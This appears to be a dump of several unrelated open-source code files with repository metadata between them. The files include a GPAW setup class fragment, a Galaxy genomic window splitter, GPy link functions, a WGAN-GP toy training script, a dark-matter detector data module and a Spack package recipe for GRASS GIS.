"""Collection of Setup objects. One for each distinct atom.
Non-distinct atoms are those with the same atomic number, setup, and basis.
Class attributes:
``nvalence`` Number of valence electrons.
``nao`` Number of atomic orbitals.
``Eref`` Reference energy.
``core_charge`` Core hole charge.
"""
def __init__(self, Z_a, setup_types, basis_sets, lmax, xc,
world=None):
list.__init__(self)
symbols = [chemical_symbols[Z] for Z in Z_a]
type_a = types2atomtypes(symbols, setup_types, default='paw')
basis_a = types2atomtypes(symbols, basis_sets, default=None)
# Construct necessary PAW-setup objects:
self.setups = {}
natoms = {}
self.id_a = zip(Z_a, type_a, basis_a)
for id in self.id_a:
setup = self.setups.get(id)
if setup is None:
Z, type, basis = id
symbol = chemical_symbols[Z]
setupdata = None
if not isinstance(type, str):
setupdata = type
# Basis may be None (meaning that the setup decides), a string
# (meaning we load the basis set now from a file) or an actual
# pre-created Basis object (meaning we just pass it along)
if isinstance(basis, str):
basis = Basis(symbol, basis, world=world)
setup = create_setup(symbol, xc, lmax, type,
basis, setupdata=setupdata, world=world)
self.setups[id] = setup
natoms[id] = 0
natoms[id] += 1
self.append(setup)
# Sum up ...
self.nvalence = 0 # number of valence electrons
self.nao = 0 # number of atomic orbitals
self.Eref = 0.0 # reference energy
self.core_charge = 0.0 # core hole charge
for id, setup in self.setups.items():
n = natoms[id]
self.Eref += n * setup.E
self.core_charge += n * (setup.Z - setup.Nv - setup.Nc)
self.nvalence += n * setup.Nv
self.nao += n * setup.niAO
def set_symmetry(self, symmetry):
"""Find rotation matrices for spherical harmonics."""
R_slmm = []
for op_cc in symmetry.op_scc:
op_vv = np.dot(np.linalg.inv(symmetry.cell_cv),
np.dot(op_cc, symmetry.cell_cv))
R_slmm.append([rotation(l, op_vv) for l in range(4)])
for setup in self.setups.values():
setup.calculate_rotations(R_slmm)
def types2atomtypes(symbols, types, default):
"""Map a types identifier to a list with a type id for each atom.
types can be a single str, or a dictionary mapping chemical
symbols and/or atom numbers to a type identifier.
    If both a symbol key and an atom-number key relate to the same atom,
    the atom-number key takes precedence.
    If types is a dictionary and contains None, that entry is used as the
    default type; otherwise the input arg ``default`` is used as default.
"""
natoms = len(symbols)
if isinstance(types, str):
return [types] * natoms
# If present, None will map to the default type, else use the input default
type_a = [types.get(None, default)] * natoms
# First symbols ...
for symbol, type in types.items():
if isinstance(symbol, str):
for a, symbol2 in enumerate(symbols):
if symbol == symbol2:
type_a[a] = type
# and then atom indices
for a, type in types.items():
if isinstance(a, int):
type_a[a] = type
return type_a
|
ajylee/gpaw-rtxs
|
gpaw/setup.py
|
Python
|
gpl-3.0
| 39,336
|
[
"ASE",
"GPAW"
] |
c44c848ac90d9d62d2cdc820e4e1a3fc87b5b89cb0b9b9db20fc1c737ce15072
|
#! /usr/bin/python
"""
Split into windows.
usage: %prog input size out_file
-l, --cols=N,N,N,N: Columns for chrom, start, end, strand in file
"""
import sys, re, os
from galaxy import eggs
import pkg_resources; pkg_resources.require( "bx-python" )
from bx.cookbook import doc_optparse
from galaxy.tools.util.galaxyops import *
def stop_err( msg ):
sys.stderr.write( msg )
sys.exit()
def main():
# Parsing Command Line here
options, args = doc_optparse.parse( __doc__ )
try:
chr_col_1, start_col_1, end_col_1, strand_col_1 = parse_cols_arg( options.cols )
inp_file, winsize, out_file, makesliding, offset = args
winsize = int(winsize)
offset = int(offset)
makesliding = int(makesliding)
if strand_col_1 <= 0:
strand = "+" #if strand is not defined, default it to +
except:
stop_err( "Data issue, click the pencil icon in the history item to correct the metadata attributes of the input dataset." )
fo = open(out_file,'w')
skipped_lines = 0
first_invalid_line = 0
invalid_line = None
if offset == 0:
makesliding = 0
for i, line in enumerate( file( inp_file ) ):
line = line.strip()
if line and line[0:1] != "#":
try:
elems = line.split('\t')
if strand_col_1 != -1:
strand = elems[strand_col_1]
start = int(elems[start_col_1])
end = int(elems[end_col_1])
if makesliding == 0:
numwin = (end - start)/winsize
else:
numwin = (end - start)/offset
if numwin > 0:
for win in range(numwin):
elems_1 = elems
elems_1[start_col_1] = str(start)
elems_1[end_col_1] = str(start + winsize)
fo.write( "%s\n" % '\t'.join( elems_1 ) )
if makesliding == 0:
start = start + winsize
else:
start = start + offset
if start+winsize > end:
break
except:
skipped_lines += 1
if not invalid_line:
first_invalid_line = i + 1
invalid_line = line
fo.close()
if makesliding == 1:
print 'Window size=%d, Sliding=Yes, Offset=%d' %(winsize, offset)
else:
print 'Window size=%d, Sliding=No' %(winsize)
if skipped_lines > 0:
print 'Skipped %d invalid lines starting with #%d: "%s"' % ( skipped_lines, first_invalid_line, invalid_line )
if __name__ == "__main__":
main()
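# Worked example (hypothetical input, not part of the original script): an
# interval "chr1  100  1100  +" with size=200 and makesliding=0 gives
# numwin = (1100 - 100) / 200 = 5 windows:
#     [100, 300], [300, 500], [500, 700], [700, 900], [900, 1100]
# With makesliding=1 and an offset of 50, windows advance by 50 bp instead,
# and the loop stops once start + winsize would pass the interval end.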
|
volpino/Yeps-EURAC
|
tools/regVariation/windowSplitter.py
|
Python
|
mit
| 2,834
|
[
"Galaxy"
] |
46357c98e6f042cd621c25421d8fb5fb08649b46947dbf48a83223dc43cfaf95
|
import sys
sys.path.append('../../..')
sys.path.append('.')
from mupif import VtkReader2
from mupif import Model
from mupif import FieldID
import pyvtk
import logging
log = logging.getLogger()
import mupif.physics.physicalquantities as PQ
timeUnits = PQ.PhysicalUnit('s', 1., [0,0,1,0,0,0,0,0,0])
##
VtkReader2.pyvtk_monkeypatch()
class Micress(Model.Model):
    def __init__(self, file):
        super(Micress, self).__init__(file)
        self.mesh = None
def getField(self, fieldID, time):
Data = pyvtk.VtkData('micress/sim.vtk')
log.debug(Data.header)
dim=[]
dim=Data.structure.dimensions
log.debug(dim)
#Number of nodes in each direction
nx=dim[0]
ny=dim[1]
nz=dim[2]
#coordinates of the points
coords=[]
coords= Data.structure.get_points()
numNodes = Data.point_data.length
log.debug(numNodes)
        if self.mesh is None:
            self.mesh = VtkReader2.readMesh(numNodes, nx, ny, nz, coords)
        f = VtkReader2.readField(self.mesh, Data, FieldID.FID_Concentration,
                                 PQ.getDimensionlessUnit(), timeUnits,
                                 "conc1", "micress/sim.vtk", 1)
return f
def solveStep(self, tstep, stageID=0, runInBackground=False):
time = tstep.getTime()
self.value=1.0*time
def getCriticalTimeStep(self):
return PQ.PhysicalQuantity(0.1,'s')
|
mupif/mupif
|
obsolete/examples/Example07-micress-local/Micress.py
|
Python
|
lgpl-3.0
| 1,447
|
[
"VTK"
] |
22089c97f9ebfd6d13e99d5af2e31e2cffaa50e4614ed5fd609ac447214e5be1
|
"""
Copyright (c) 2015 Andreea Georgescu
Created on Wed Nov 19 00:18:55 2014
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from __future__ import absolute_import
from __future__ import division
import numpy as np
pi = np.pi
name = "CDMSlite2013CoGeNTQ"
modulated = False
energy_resolution_type = "Gaussian"
def EnergyResolution(e):
return 0.014 * np.ones_like(e)
FFSD = 'GaussianFFSD'
FFSI = 'HelmFF'
FF = {'SI': FFSI,
'SDPS': FFSD,
'SDAV': FFSD,
}
target_nuclide_AZC_list = np.array([[70., 32., 0.19608], [72., 32., 0.27040],
[73., 32., 0.07790], [74., 32., 0.37378],
[76., 32., 0.08184]])
target_nuclide_JSpSn_list = \
np.array([[0., 0., 0.], [0., 0., 0.],
[9./2, 0.0392517 * np.sqrt(((2*9./2 + 1)*(9./2 + 1))/(4*pi*9./2)),
.375312 * np.sqrt(((2*9./2 + 1)*(9./2 + 1))/(4*pi*9./2))],
[0., 0., 0.], [0., 0., 0.]])
target_nuclide_mass_list = np.array([65.134, 66.995, 67.9278, 68.8571, 70.7203])
num_target_nuclides = target_nuclide_mass_list.size
def QuenchingFactor(e):
return (1 + 69./3 * 0.19935 * e**0.1204)/(1 + 69./3)
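# Worked value (illustration only, not in the original source): at
# e = 1 keV the factor above is
#     (1 + 23 * 0.19935 * 1) / (1 + 23) = 5.585 / 24 ~= 0.233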
Ethreshold = 0.17
Emaximum = 7
ERmaximum = 7
def Efficiency(e): return np.array(0.985) if Ethreshold <= e < Emaximum else np.array(0.)
def Efficiency_ER(er):
return np.ones_like(er)
Exposure = 0.6 * 10.
ERecoilList = np.array([0.10142857142857144, 0.10285714285714286, 0.10428571428571429,
0.10571428571428572, 0.10714285714285715, 0.10857142857142857,
0.11142857142857143, 0.11285714285714286, 0.1142857142857143,
0.11571428571428571, 0.11714285714285715, 0.11857142857142858,
0.12142857142857144, 0.12285714285714286, 0.12428571428571429,
0.12571428571428572, 0.12714285714285714, 0.1285714285714286,
0.13166666666666668, 0.13333333333333333, 0.135,
0.1366666666666667, 0.13833333333333334, 0.14333333333333334,
0.1466666666666667, 0.15333333333333335, 0.15666666666666668,
0.165, 0.17333333333333334, 0.17666666666666667, 0.185,
0.19333333333333333, 0.19666666666666668, 0.20500000000000002,
0.21500000000000002, 0.255, 0.265, 0.29500000000000004, 0.315,
0.345, 0.405, 0.41500000000000004, 0.42500000000000004,
0.43500000000000005, 0.46499999999999997, 0.485, 0.495, 0.515,
0.555, 0.5650000000000001, 0.645, 0.705, 0.745, 0.785, 0.815,
0.845, 0.895, 0.905, 0.935, 1.085, 1.125, 1.1550000000000002,
1.185, 1.2233333333333336, 1.2266666666666668,
1.2333333333333336, 1.2366666666666668, 1.2633333333333334,
1.2666666666666666, 1.275, 1.2825, 1.2850000000000001, 1.2875,
1.2925, 1.295, 1.2975, 1.302, 1.304, 1.306, 1.308,
1.3133333333333335, 1.3166666666666667, 1.3250000000000002,
1.3333333333333335, 1.3366666666666667, 1.3450000000000002,
1.3533333333333335, 1.3566666666666667, 1.3650000000000002,
1.3733333333333335, 1.3766666666666667, 1.395, 1.455, 1.495,
1.525, 1.6124999999999998, 1.7624999999999997, 1.9125, 1.96875,
1.9874999999999998, 2.00625, 2.0625, 2.2874999999999996,
2.34375, 2.3625, 2.3812499999999996, 2.4375, 2.5125, 2.65,
2.675, 2.71875, 2.7375, 2.7562499999999996, 2.8125, 2.875,
2.9, 2.9625, 3.0374999999999996, 3.0999999999999996, 3.125,
3.175, 3.2, 3.2625, 3.4124999999999996, 3.4875,
3.6249999999999996, 3.65, 3.7125, 3.7874999999999996, 3.8625,
3.9375, 4.0875, 4.1625, 4.225, 4.25, 4.364999999999999, 4.38,
4.395, 4.41, 4.44375, 4.4625, 4.48125, 4.5375, 4.675,
4.699999999999999, 4.762499999999999, 4.825, 4.85, 4.9125,
4.96875, 4.9875, 5.00625, 5.05, 5.074999999999999, 5.2125,
5.2875, 5.35, 5.375, 5.5, 5.5249999999999995, 5.5875, 5.725,
5.75, 5.8, 5.824999999999999, 5.8687499999999995,
5.887499999999999, 5.90625, 5.95, 5.975, 6.1, 6.125, 6.175,
6.199999999999999, 6.4125, 6.465, 6.4799999999999995, 6.495,
6.51, 6.5625, 6.6187499999999995, 6.637499999999999, 6.65625,
6.7125, 6.775, 6.8, 6.914999999999999, 6.93, 6.944999999999999,
6.96, 7.012499999999999, 7.0875, 7.1625, 7.3,
7.324999999999999, 7.387499999999999, 7.4625, 7.5125,
7.5249999999999995, 7.5375, 7.55, 7.562499999999999, 7.825,
7.85, 7.8999999999999995, 7.925, 7.975, 8., 8.0625, 8.1375,
8.212499999999999, 8.34, 8.355, 8.37, 8.385, 8.425, 8.45,
8.493749999999999, 8.5125, 8.53125, 8.565, 8.58,
8.594999999999999, 8.61, 8.6625, 8.712499999999999, 8.725,
8.7375, 8.75, 8.7625, 8.8, 8.825, 8.862499999999999, 8.875,
8.8875, 8.899999999999999, 8.9125, 8.931818181818182,
8.938636363636363, 8.945454545454545, 8.952272727272726,
8.959090909090909, 8.96590909090909, 8.972727272727273,
8.979545454545454, 8.986363636363636, 8.993181818181817, 9.015,
9.03, 9.045, 9.059999999999999, 9.09, 9.105, 9.12, 9.135,
9.160714285714286, 9.17142857142857, 9.182142857142857,
9.192857142857143, 9.20357142857143, 9.214285714285714,
9.237499999999999, 9.25, 9.2625, 9.274999999999999, 9.2875,
9.337499999999999, 9.39375, 9.4125, 9.431249999999999, 9.46875,
9.4875, 9.50625, 9.55, 9.575, 9.618749999999999, 9.6375,
9.65625, 9.712499999999999, 9.765, 9.78, 9.795,
9.809999999999999, 9.8325, 9.84, 9.8475, 9.855, 9.8625, 9.87,
9.8775, 9.885, 9.8925, 9.908333333333333, 9.916666666666666,
9.925, 9.933333333333334, 9.941666666666666, 9.95,
9.958333333333334, 9.966666666666667, 9.985714285714286,
9.99642857142857, 10.007142857142856, 10.017857142857142,
10.028571428571428, 10.039285714285713, 10.055357142857142,
10.060714285714285, 10.066071428571428, 10.071428571428571,
10.076785714285714, 10.082142857142857, 10.087499999999999,
10.092857142857142, 10.098214285714285, 10.103571428571428,
10.10892857142857, 10.114285714285714, 10.119642857142857,
10.128125, 10.13125, 10.134375, 10.1375, 10.140625, 10.14375,
10.146875, 10.15, 10.153125, 10.15625, 10.159374999999999,
10.1625, 10.165625, 10.16875, 10.171875, 10.174999999999999,
10.178125, 10.181249999999999, 10.184375, 10.1875,
10.190624999999999, 10.19375, 10.196874999999999, 10.203125,
10.206249999999999, 10.209375, 10.212499999999999, 10.215625,
10.21875, 10.221874999999999, 10.225, 10.228125, 10.23125,
10.234375, 10.2375, 10.240625, 10.24375, 10.246875, 10.25,
10.253125, 10.25625, 10.259375, 10.2625, 10.265625, 10.26875,
10.271875, 10.27734375, 10.2796875, 10.282031250000001,
10.284375, 10.28671875, 10.2890625, 10.29140625, 10.29375,
10.29609375, 10.2984375, 10.30078125, 10.303125, 10.30546875,
10.3078125, 10.31015625, 10.3125, 10.31484375, 10.3171875,
10.31953125, 10.321875, 10.32421875, 10.3265625, 10.32890625,
10.33125, 10.33359375, 10.3359375, 10.33828125, 10.340625,
10.342968749999999, 10.3453125, 10.34765625, 10.353, 10.356,
10.359, 10.362, 10.365, 10.368, 10.370999999999999,
10.373999999999999, 10.376999999999999, 10.379999999999999,
10.383, 10.386, 10.389, 10.392, 10.395, 10.398, 10.401,
10.404, 10.406999999999998, 10.409999999999998,
10.412999999999998, 10.415999999999999, 10.418999999999999,
10.421999999999999, 10.428260869565216, 10.431521739130433,
10.43478260869565, 10.43804347826087, 10.441304347826087,
10.444565217391304, 10.447826086956521, 10.451086956521738,
10.454347826086956, 10.457608695652173, 10.46086956521739,
10.464130434782609, 10.467391304347826, 10.470652173913043,
10.47391304347826, 10.477173913043478, 10.480434782608695,
10.483695652173912, 10.48695652173913, 10.490217391304348,
10.493478260869566, 10.496739130434783, 10.503947368421052,
10.507894736842106, 10.511842105263158, 10.51578947368421,
10.519736842105264, 10.523684210526316, 10.527631578947368,
10.531578947368422, 10.535526315789474, 10.539473684210526,
10.543421052631578, 10.547368421052632, 10.551315789473684,
10.555263157894736, 10.55921052631579, 10.563157894736841,
10.567105263157893, 10.571052631578947, 10.581249999999999,
10.587499999999999, 10.59375, 10.6, 10.60625, 10.6125,
10.61875, 10.625, 10.63125, 10.6375, 10.64375, 10.66875,
10.6875, 10.70625, 10.743749999999999, 10.7625, 10.78125,
10.837499999999999, 10.89, 10.905, 10.92, 10.934999999999999,
10.96875, 10.9875, 11.00625, 11.0625, 11.1375,
11.212499999999999, 11.3625, 11.5125, 11.587499999999999, 11.7375])
|
SamWitte/Codds_DarkMatter
|
src/Data/CDMSlite2013CoGeNTQ.py
|
Python
|
gpl-2.0
| 11,135
|
[
"Gaussian"
] |
d1facc7c2d405d47383f6182896dfae6c5d8d364156a3e6f120638c892284717
|
# Copyright (c) 2012-2015 The GPy authors (see AUTHORS.txt)
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import numpy as np
import scipy.special  # needed for log1p below; plain "import scipy" does not load submodules
from ..util.univariate_Gaussian import std_norm_cdf, std_norm_pdf
import scipy as sp
from ..util.misc import safe_exp, safe_square, safe_cube, safe_quad, safe_three_times
class GPTransformation(object):
"""
Link function class for doing non-Gaussian likelihoods approximation
:param Y: observed output (Nx1 numpy.darray)
.. note:: Y values allowed depend on the likelihood_function used
"""
def __init__(self):
pass
def transf(self,f):
"""
        Gaussian process transformation function, latent space -> output space
"""
raise NotImplementedError
def dtransf_df(self,f):
"""
derivative of transf(f) w.r.t. f
"""
raise NotImplementedError
def d2transf_df2(self,f):
"""
second derivative of transf(f) w.r.t. f
"""
raise NotImplementedError
def d3transf_df3(self,f):
"""
third derivative of transf(f) w.r.t. f
"""
raise NotImplementedError
class Identity(GPTransformation):
"""
.. math::
g(f) = f
"""
def transf(self,f):
return f
def dtransf_df(self,f):
return np.ones_like(f)
def d2transf_df2(self,f):
return np.zeros_like(f)
def d3transf_df3(self,f):
return np.zeros_like(f)
class Probit(GPTransformation):
"""
.. math::
g(f) = \\Phi^{-1} (mu)
"""
def transf(self,f):
return std_norm_cdf(f)
def dtransf_df(self,f):
return std_norm_pdf(f)
def d2transf_df2(self,f):
return -f * std_norm_pdf(f)
def d3transf_df3(self,f):
return (safe_square(f)-1.)*std_norm_pdf(f)
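# (Derivative identities used above, for reference: with phi the standard
#  normal pdf, phi'(f) = -f phi(f) and phi''(f) = (f^2 - 1) phi(f), which
#  is exactly what d2transf_df2 and d3transf_df3 return.)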
class Cloglog(GPTransformation):
"""
Complementary log-log link
.. math::
p(f) = 1 - e^{-e^f}
or
f = \log (-\log(1-p))
"""
def transf(self,f):
ef = safe_exp(f)
return 1-np.exp(-ef)
def dtransf_df(self,f):
ef = safe_exp(f)
return np.exp(f-ef)
def d2transf_df2(self,f):
ef = safe_exp(f)
return -np.exp(f-ef)*(ef-1.)
def d3transf_df3(self,f):
ef = safe_exp(f)
ef2 = safe_square(ef)
three_times_ef = safe_three_times(ef)
r_val = np.exp(f-ef)*(1.-three_times_ef + ef2)
return r_val
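# (For the cloglog link above: with p(f) = 1 - exp(-e^f),
#  dp/df = exp(f - e^f), d2p/df2 = exp(f - e^f) (1 - e^f) and
#  d3p/df3 = exp(f - e^f) (1 - 3 e^f + e^{2f}), matching the code.)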
class Log(GPTransformation):
"""
.. math::
g(f) = \\log(\\mu)
"""
def transf(self,f):
return safe_exp(f)
def dtransf_df(self,f):
return safe_exp(f)
def d2transf_df2(self,f):
return safe_exp(f)
def d3transf_df3(self,f):
return safe_exp(f)
class Log_ex_1(GPTransformation):
"""
.. math::
g(f) = \\log(\\exp(\\mu) - 1)
"""
def transf(self,f):
return scipy.special.log1p(safe_exp(f))
def dtransf_df(self,f):
ef = safe_exp(f)
return ef/(1.+ef)
def d2transf_df2(self,f):
ef = safe_exp(f)
aux = ef/(1.+ef)
return aux*(1.-aux)
def d3transf_df3(self,f):
ef = safe_exp(f)
aux = ef/(1.+ef)
daux_df = aux*(1.-aux)
return daux_df - (2.*aux*daux_df)
class Reciprocal(GPTransformation):
def transf(self,f):
return 1./f
def dtransf_df(self, f):
f2 = safe_square(f)
return -1./f2
def d2transf_df2(self, f):
f3 = safe_cube(f)
return 2./f3
def d3transf_df3(self,f):
f4 = safe_quad(f)
return -6./f4
class Heaviside(GPTransformation):
"""
.. math::
g(f) = I_{x \\geq 0}
"""
def transf(self,f):
#transformation goes here
return np.where(f>0, 1, 0)
def dtransf_df(self,f):
raise NotImplementedError("This function is not differentiable!")
def d2transf_df2(self,f):
raise NotImplementedError("This function is not differentiable!")
|
mikecroucher/GPy
|
GPy/likelihoods/link_functions.py
|
Python
|
bsd-3-clause
| 4,019
|
[
"Gaussian"
] |
23f41069264c15b13dfb0556ddb6d339f9c8bec01c18c462c9bfebe85b12ce51
|
from django.conf.urls import include, url
# from django.conf import settings
from django.contrib import admin
from wagtail.wagtailadmin import urls as wagtailadmin_urls
from wagtail.wagtaildocs import urls as wagtaildocs_urls
from wagtail.wagtailcore import urls as wagtail_urls
from wapps import urls as wapps_urls
from .views import error, first_visit, site_feed
urlpatterns = [
url(r'^django-admin/', include(admin.site.urls)),
url(r'^admin/', include(wagtailadmin_urls)),
url(r'^documents/', include(wagtaildocs_urls)),
url(r'^search/', include('wagtail.wagtailsearch.urls.frontend')),
# Test views
url(r'^error/$', error, name='error'),
url(r'^first-visit/$', first_visit, name='first-visit'),
url(r'^atom/$', site_feed, name='atom'),
# url(r'^i18n/', include('django.conf.urls.i18n')),
# url(r'^forms/', include(wapps_forms_urls)),
# url('^sitemap\.xml$', sitemap),
url(r'', include(wapps_urls)),
url(r'', include(wagtail_urls)),
]
|
apihackers/wapps
|
tests/app/urls.py
|
Python
|
mit
| 1,001
|
[
"VisIt"
] |
2eda3ff657bbbf02a9540c59d0a16d311332d42a5ed5af49ccbf8c11ddc23189
|
import os, sys
sys.path.append(os.getcwd())
import random
import time
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
import sklearn.datasets
import tflib as lib
import tflib.ops.linear
import tflib.plot
MODE = 'wgan-gp' # wgan or wgan-gp
DATASET = '8gaussians' # 8gaussians, 25gaussians, swissroll
DIM = 512 # Model dimensionality
FIXED_GENERATOR = False # whether to hold the generator fixed at real data plus
# Gaussian noise, as in the plots in the paper
LAMBDA = .1 # Smaller lambda seems to help for toy tasks specifically
CRITIC_ITERS = 5 # How many critic iterations per generator iteration
BATCH_SIZE = 256 # Batch size
ITERS = 100000 # how many generator iterations to train for
lib.print_model_settings(locals().copy())
def ReLULayer(name, n_in, n_out, inputs):
output = lib.ops.linear.Linear(
name+'.Linear',
n_in,
n_out,
inputs,
initialization='he'
)
output = tf.nn.relu(output)
return output
def Generator(n_samples, real_data):
if FIXED_GENERATOR:
return real_data + (1.*tf.random_normal(tf.shape(real_data)))
else:
noise = tf.random_normal([n_samples, 2])
output = ReLULayer('Generator.1', 2, DIM, noise)
output = ReLULayer('Generator.2', DIM, DIM, output)
output = ReLULayer('Generator.3', DIM, DIM, output)
output = lib.ops.linear.Linear('Generator.4', DIM, 2, output)
return output
def Discriminator(inputs):
output = ReLULayer('Discriminator.1', 2, DIM, inputs)
output = ReLULayer('Discriminator.2', DIM, DIM, output)
output = ReLULayer('Discriminator.3', DIM, DIM, output)
output = lib.ops.linear.Linear('Discriminator.4', DIM, 1, output)
return tf.reshape(output, [-1])
real_data = tf.placeholder(tf.float32, shape=[None, 2])
fake_data = Generator(BATCH_SIZE, real_data)
disc_real = Discriminator(real_data)
disc_fake = Discriminator(fake_data)
# WGAN loss
disc_cost = tf.reduce_mean(disc_fake) - tf.reduce_mean(disc_real)
gen_cost = -tf.reduce_mean(disc_fake)
# WGAN gradient penalty
if MODE == 'wgan-gp':
alpha = tf.random_uniform(
shape=[BATCH_SIZE,1],
minval=0.,
maxval=1.
)
interpolates = alpha*real_data + ((1-alpha)*fake_data)
disc_interpolates = Discriminator(interpolates)
gradients = tf.gradients(disc_interpolates, [interpolates])[0]
slopes = tf.sqrt(tf.reduce_sum(tf.square(gradients), reduction_indices=[1]))
gradient_penalty = tf.reduce_mean((slopes-1)**2)
disc_cost += LAMBDA*gradient_penalty
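# The penalty above implements the WGAN-GP objective term
#     LAMBDA * E[(||grad_xhat D(xhat)|| - 1)^2]
# evaluated at random interpolates xhat between real and generated points,
# which softly enforces the critic's 1-Lipschitz constraint instead of
# weight clipping.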
disc_params = lib.params_with_name('Discriminator')
gen_params = lib.params_with_name('Generator')
if MODE == 'wgan-gp':
disc_train_op = tf.train.AdamOptimizer(
learning_rate=1e-4,
beta1=0.5,
beta2=0.9
).minimize(
disc_cost,
var_list=disc_params
)
if len(gen_params) > 0:
gen_train_op = tf.train.AdamOptimizer(
learning_rate=1e-4,
beta1=0.5,
beta2=0.9
).minimize(
gen_cost,
var_list=gen_params
)
else:
gen_train_op = tf.no_op()
else:
disc_train_op = tf.train.RMSPropOptimizer(learning_rate=5e-5).minimize(
disc_cost,
var_list=disc_params
)
if len(gen_params) > 0:
gen_train_op = tf.train.RMSPropOptimizer(learning_rate=5e-5).minimize(
gen_cost,
var_list=gen_params
)
else:
gen_train_op = tf.no_op()
# Build an op to do the weight clipping
clip_ops = []
for var in disc_params:
clip_bounds = [-.01, .01]
clip_ops.append(
tf.assign(
var,
tf.clip_by_value(var, clip_bounds[0], clip_bounds[1])
)
)
clip_disc_weights = tf.group(*clip_ops)
print "Generator params:"
for var in lib.params_with_name('Generator'):
print "\t{}\t{}".format(var.name, var.get_shape())
print "Discriminator params:"
for var in lib.params_with_name('Discriminator'):
print "\t{}\t{}".format(var.name, var.get_shape())
frame_index = [0]
def generate_image(true_dist):
"""
Generates and saves a plot of the true distribution, the generator, and the
critic.
"""
N_POINTS = 128
RANGE = 3
points = np.zeros((N_POINTS, N_POINTS, 2), dtype='float32')
points[:,:,0] = np.linspace(-RANGE, RANGE, N_POINTS)[:,None]
points[:,:,1] = np.linspace(-RANGE, RANGE, N_POINTS)[None,:]
points = points.reshape((-1,2))
    samples = session.run(fake_data, feed_dict={real_data: points})
    disc_map = session.run(disc_real, feed_dict={real_data: points})
plt.clf()
x = y = np.linspace(-RANGE, RANGE, N_POINTS)
plt.contour(x,y,disc_map.reshape((len(x), len(y))).transpose())
plt.scatter(true_dist[:, 0], true_dist[:, 1], c='orange', marker='+')
plt.scatter(samples[:, 0], samples[:, 1], c='green', marker='+')
plt.savefig('frame'+str(frame_index[0])+'.jpg')
frame_index[0] += 1
# Dataset iterator
def inf_train_gen():
if DATASET == '25gaussians':
dataset = []
for i in xrange(100000/25):
for x in xrange(-2, 3):
for y in xrange(-2, 3):
point = np.random.randn(2)*0.05
point[0] += 2*x
point[1] += 2*y
dataset.append(point)
dataset = np.array(dataset, dtype='float32')
np.random.shuffle(dataset)
dataset /= 2.828 # stdev
while True:
for i in xrange(len(dataset)/BATCH_SIZE):
yield dataset[i*BATCH_SIZE:(i+1)*BATCH_SIZE]
elif DATASET == 'swissroll':
while True:
data = sklearn.datasets.make_swiss_roll(
n_samples=BATCH_SIZE,
noise=0.25
)[0]
data = data.astype('float32')[:, [0, 2]]
data /= 7.5 # stdev plus a little
yield data
elif DATASET == '8gaussians':
scale = 2.
centers = [
(1,0),
(-1,0),
(0,1),
(0,-1),
(1./np.sqrt(2), 1./np.sqrt(2)),
(1./np.sqrt(2), -1./np.sqrt(2)),
(-1./np.sqrt(2), 1./np.sqrt(2)),
(-1./np.sqrt(2), -1./np.sqrt(2))
]
centers = [(scale*x,scale*y) for x,y in centers]
while True:
dataset = []
for i in xrange(BATCH_SIZE):
point = np.random.randn(2)*.02
center = random.choice(centers)
point[0] += center[0]
point[1] += center[1]
dataset.append(point)
dataset = np.array(dataset, dtype='float32')
dataset /= 1.414 # stdev
yield dataset
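            # (Why 1.414: the 8 centers at radius scale = 2 have squared
            #  x-coordinates 4, 4, 0, 0, 2, 2, 2, 2, averaging to 2 per
            #  axis, so the mixture stdev is ~sqrt(2) ~= 1.414; the 0.02
            #  noise is negligible.)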
# Train loop!
with tf.Session() as session:
session.run(tf.initialize_all_variables())
gen = inf_train_gen()
for iteration in xrange(ITERS):
# Train generator
if iteration > 0:
_ = session.run(gen_train_op)
# Train critic
for i in xrange(CRITIC_ITERS):
_data = gen.next()
_disc_cost, _ = session.run(
[disc_cost, disc_train_op],
feed_dict={real_data: _data}
)
if MODE == 'wgan':
_ = session.run([clip_disc_weights])
# Write logs and save samples
lib.plot.plot('disc cost', _disc_cost)
if iteration % 100 == 99:
lib.plot.flush()
generate_image(_data)
lib.plot.tick()
|
aalitaiga/improved_wgan_training
|
gan_toy.py
|
Python
|
mit
| 7,675
|
[
"Gaussian"
] |
780ef574882abff5f29aadd2001ef205aaafd44efa7a7cff5ebfb36c8060a2b7
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Grass(AutotoolsPackage):
"""GRASS GIS (Geographic Resources Analysis Support System), is a free
and open source Geographic Information System (GIS) software suite
used for geospatial data management and analysis, image processing,
graphics and maps production, spatial modeling, and visualization."""
homepage = "https://grass.osgeo.org"
url = "https://grass.osgeo.org/grass78/source/grass-7.8.5.tar.gz"
list_url = "https://grass.osgeo.org/download/software/sources/"
git = "https://github.com/OSGeo/grass.git"
maintainers = ['adamjstewart']
version('master', branch='master')
version('7.8.5', sha256='a359bb665524ecccb643335d70f5436b1c84ffb6a0e428b78dffebacd983ff37')
version('7.8.2', sha256='33576f7078f805b39ca20c2fa416ac79c64260c0581072a6dc7d813f53aa9abb')
version('7.8.1', sha256='6ae578fd67afcce7abec4ba4505dcc55b3d2dfe0ca46b99d966cb148c654abb3')
version('7.8.0', sha256='4b1192294e959ffd962282344e4ff325c4472f73abe605e246a1da3beda7ccfa')
version('7.6.1', sha256='9e25c99cafd16ed8f5e2dca75b5a10dc2af0568dbedf3fc39f1c5a0a9c840b0b', deprecated=True)
version('7.4.4', sha256='96a39e273103f7375a670eba94fa3e5dad2819c5c5664c9aee8f145882a94e8c', deprecated=True)
version('7.4.3', sha256='004e65693ee97fd4d5dc7ad244e3286a115dccd88964d04be61c07db6574b399', deprecated=True)
version('7.4.2', sha256='18eb19bc0aa4cd7be3f30f79ac83f9d0a29c63657f4c1b05bf4c5d5d57a8f46d', deprecated=True)
version('7.4.1', sha256='560b8669caaafa9e8dbd4bbf2b4b4bbab7dca1cc46ee828eaf26c744fe0635fc', deprecated=True)
version('7.4.0', sha256='cb6fa188e030a3a447fc5451fbe0ecbeb4069ee2fd1bf52ed8e40e9b89e293cc', deprecated=True)
variant('cxx', default=True, description='Support C++ functionality')
